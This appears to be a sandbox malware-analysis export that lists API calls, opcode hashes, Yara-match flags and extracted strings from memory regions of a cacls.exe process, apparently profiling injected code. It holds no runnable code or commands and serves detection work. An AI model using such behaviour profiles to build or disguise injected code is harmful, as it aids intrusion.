                                                            • Instruction ID: 47271cc18b08e975fbd7422dfbf5a644af912ef84d1aa5280839538a18d0c456
                                                            • Opcode Fuzzy Hash: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
                                                            • Instruction Fuzzy Hash: 36315475A0020AAFDB00DFD9D8809EFB7B9FF88304B108599E555EB215D771EE45CBA0
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                            • Instruction ID: aad4941b7ea61558eee1e9edfc625751daada12987eeb6ab7bbd8eb17568fa22
                                                            • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                            • Instruction Fuzzy Hash: 1911CA719103097FDB10EBE5DC46FAA73F8DB55360F0041D9F90C9B282EB74AA448795
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BE4902
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction ID: 182336a043f820feeb04b47d66afd93aed23ce4115bd5e5fd7d4b55d980789ef
                                                            • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                            • Instruction Fuzzy Hash: B0011EB9D0020DABDF10EAA5DD42FAEB7B89B54308F0041E5EA0897241F771EB58CB91
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,00BE867E,00000010,?,?,?,00000044,?,00000010,00BE867E,?,?,?), ref: 00BF9CD0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                            • Instruction ID: 0863de7b894bea71686f39387520c426e47723c6b47960d8b3a79c2e43bbd014
                                                            • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                            • Instruction Fuzzy Hash: 3E0180B6214208BBCB44DF99DC81EEB77EDAF8D754F508609BA19A3241D630F851CBA4
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00BE4902
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction ID: fbe394c8b0651c3fa69e6f2c74e167895d28351c0e27fb3e370b048dc4802148
                                                            • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                            • Instruction Fuzzy Hash: B7F02831E842498FDB00CFE8DC86BD9B3F0FB56719F1406D9DA099B241E3626556CB45
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BD9E35
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                            • Instruction ID: b30474d2aefbf1b405d5d15232f0a973251ad9947f93019c7258dd73883f0738
                                                            • Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                            • Instruction Fuzzy Hash: 80F0303338021436D221A5E99C03FDBB68C8B817A1F140466F70CDA285D591B50582A9
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00BD9E35
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                            • Instruction ID: bfd43d71f6fdd0d4b884ff8f1078d6eb03fb3e3cea941976228436149c6c0f13
                                                            • Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                            • Instruction Fuzzy Hash: 96F0653234025476D331A6A98C43FEBA79D8F81750F140459F749AB2C5DAA1B945C3A8
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                            • Instruction ID: 8365241270d2bd2545916215b3cbe496c804806a95c98d1535d514652d33c5ab
                                                            • Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                            • Instruction Fuzzy Hash: 5EE092362402057BF610DBE5DC47F56729CC701791F0446E8FE0CDB2C2EA25E62096E5
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00BE1D39,?,00BF62C8,00BE1D39,00BF5A0E,00BF62C8,?,00BE1D39,00BF5A0E,00001000,?,?,?), ref: 00BF9BCC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction ID: bee190e263f195daf4c1ac0be8464e6f74d4eef8bb9575c50361c21716ab2bba
                                                            • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                            • Instruction Fuzzy Hash: 76E06D72200208BBC614EE58DC41FEB73ACDFC9710F004409F909A7241DA70B915CBF4
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,00BE4101,000000F4), ref: 00BF9C1F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction ID: 21044b6a456a7c39009db4168e31aee5602e742f031aa9d25ab0b55c5bab7187
                                                            • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                            • Instruction Fuzzy Hash: 36E06D712002087BC614EE99DC41FEB73ACEFC5710F004449F908A7241DA70B955CBB5
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00BE86EC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                            • Instruction ID: 260db1c8b030a12400d5ebbffb81c7f9b563ed1f6b5c477d88809295dd7ec839
                                                            • Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                            • Instruction Fuzzy Hash: 21E0DF71200B082FEA24AE6CCC52FA233989B08724F544A90B95CDF3D6DF39F9025258
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00BE86EC
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                            • Instruction ID: 06c6d33ee7bdec2db8a2ba7a4432b4fee5b8839d6ea01d911f457827bcb9fa99
                                                            • Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                            • Instruction Fuzzy Hash: 0FE0D8312007041BE6245AACDC41F61338C9748724F440590B95CCF2D1DA38F9015154
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00BE2040,00BF834F,00BF5A0E,00BE2006), ref: 00BE84E3
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                            • Instruction ID: 5df15b35c3f94b0d5ebf913abd3eb5c382e8ca467d64f53a034c0a97059bd588
                                                            • Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                            • Instruction Fuzzy Hash: 9DD05E723403093BF610E6E9CC03F1632CC8B05790F0548A4BA4CDB3C2EA65F60046A9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                            • Instruction ID: 9523a707231459e31fae3626f8c0c23d1e041e2984e9a571f35a46fe233f1815
                                                            • Opcode Fuzzy Hash: 66fec827fd0e16ca67add6bbfa40072ad633f55ae0c95e746a0bffbfc5ca1f6f
                                                            • Instruction Fuzzy Hash: AEB09B719015C5C9DA11E7A04A08717790467D0741F29C4E1E7074641F4739C5D5E176
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "n$)t$,$/a$8n$=G$@$B`$Pq$Yu$Z4$jJ$p$us$x`$z`$q$~
                                                            • API String ID: 0-2356214696
                                                            • Opcode ID: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                            • Instruction ID: 8278ad37f4dcf6c7fbdecf022d2d18d2d39510085ddd8ec1d124f0a2873519fb
                                                            • Opcode Fuzzy Hash: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                            • Instruction Fuzzy Hash: A8617CB0D05769CFEB20CF85D9587CEBAB1BB45308F1081C9D1583B281CBBA1A99CF55
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                            • Instruction ID: 4a23e6675ed995defea98501fe9c781399d188edd0385c38e70d8dce7564a361
                                                            • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                            • Instruction Fuzzy Hash: E841E57461CF094FD76CEFA890827BBB3E2FB45300F54092DD986C7292EA71D8468789
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                            • Instruction ID: cf24ec8c7d3c79af9326d34dbc148c2a78a8f74aec4659ad24edb85bd5169124
                                                            • Opcode Fuzzy Hash: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                            • Instruction Fuzzy Hash: 3B21AF326062499BC721DE28A8968E5FFA4FF1661871402DFD8549B642F717C82597C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                            • Instruction ID: baee78ab44aec8c4c7c44800d05cf1fd855467295a4afe1b6753d9c29b99caa1
                                                            • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                            • Instruction Fuzzy Hash: 25914FF04082988AC7158F55A1612AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                            • Instruction ID: a54cee13f22fce9d80688fa4f69d2cc347194f5aa364404fc692ec7e779dbb5b
                                                            • Opcode Fuzzy Hash: 0df3a5f6d5e5f040a6ee206413475dde34ef3efde1f7bff16a5e473c01fc46e5
                                                            • Instruction Fuzzy Hash: 5A51F9B5A0411ABFCB15EBDC898097EF7B8BB0820471485E9F8A5D7641D774DE40CBE1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 0cd6b5defd8d639f470ed4fe3a45a34dbc2929332820661137164c93beac7440
                                                            • Instruction ID: f1fe47487dff63b215a00d9356fe65bab63c82eaf443a7e552fc5fcd785d6f23
                                                            • Opcode Fuzzy Hash: 0cd6b5defd8d639f470ed4fe3a45a34dbc2929332820661137164c93beac7440
                                                            • Instruction Fuzzy Hash: 5251C5B5A10689AFCF60DEDCC89097FF7B9AB44204B0488EEE495D76C2D7B4DA40C760
                                                            Strings
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03884655
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038846FC
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03884725
                                                            • ExecuteOptions, xrefs: 038846A0
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03884787
                                                            • Execute=1, xrefs: 03884713
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03884742
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                            • Instruction ID: 3fd9a1edaf379f3fb96cb60064781e023ab59b7e207dec2690491384df5979ef
                                                            • Opcode Fuzzy Hash: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                            • Instruction Fuzzy Hash: 86510635A0031DAEEF10EBE9DC85BAE77A9EF04304F4800E9F615EB681E7709A45CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction ID: 065cecc1d7349f2334bb7ad596634d972957a40fbbf25056104451ea1a46e25d
                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                            • Instruction Fuzzy Hash: 1A022575608341AFC704CF98C490A6FBBE5FFD9704F548AADB9958B260EB31E905CB42
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 8da553665589fe1e2ee3617bf35ff440f43b0d6d00c0670b2d881e105068163f
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 45818C74E062499FDF2ACEE8C8917AEBBA6AF65350F1C41D9FC61E7290C6349840CB51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: e467d7a0443ca07d8b5aa3ca6ae7b72fade15c7d9a864329b6823a3c18486532
                                                            • Instruction ID: 9311d0070ba6d73ab3253b7dc94b5fad0487705edb450727df9824d9eaa3fca7
                                                            • Opcode Fuzzy Hash: e467d7a0443ca07d8b5aa3ca6ae7b72fade15c7d9a864329b6823a3c18486532
                                                            • Instruction Fuzzy Hash: D5216576A10259ABDB11DFF9CC40AEEB7F8EF44644F0805AAE905D7240E770E9018BA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2552551045.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3600000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: |de$|de$|de$|de$|de$|de
                                                            • API String ID: 0-3287866246
                                                            • Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                            • Instruction ID: 71293cb3c602c8690e0bdb26af1243cc0fb80f01de1192dc653f18f0fdd79240
                                                            • Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
                                                            • Instruction Fuzzy Hash: C4215970918B4ECFCF84EFA8D485AAEBBB0FB19300F00455AD549E7261D7349645CB96
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038802BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038802E7
                                                            • RTL: Re-Waiting, xrefs: 0388031E
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                            • Instruction ID: e1b9d10b26858cec81b3109f3c9a83350043f157a5ef87ef513cb3058f84bf73
                                                            • Opcode Fuzzy Hash: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                            • Instruction Fuzzy Hash: 25E1A175A04741AFD725DFA8C884B2AB7E0BB85314F180A9DF5A5CB3E1D774D844CB82
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 03887BAC
                                                            • RTL: Resource at %p, xrefs: 03887B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03887B7F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
                                                            • Instruction ID: b7c67b77407224e4d9a3ed1e703c2330f38538d7a5886cce8087a02cd7e9a90b
                                                            • Opcode Fuzzy Hash: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
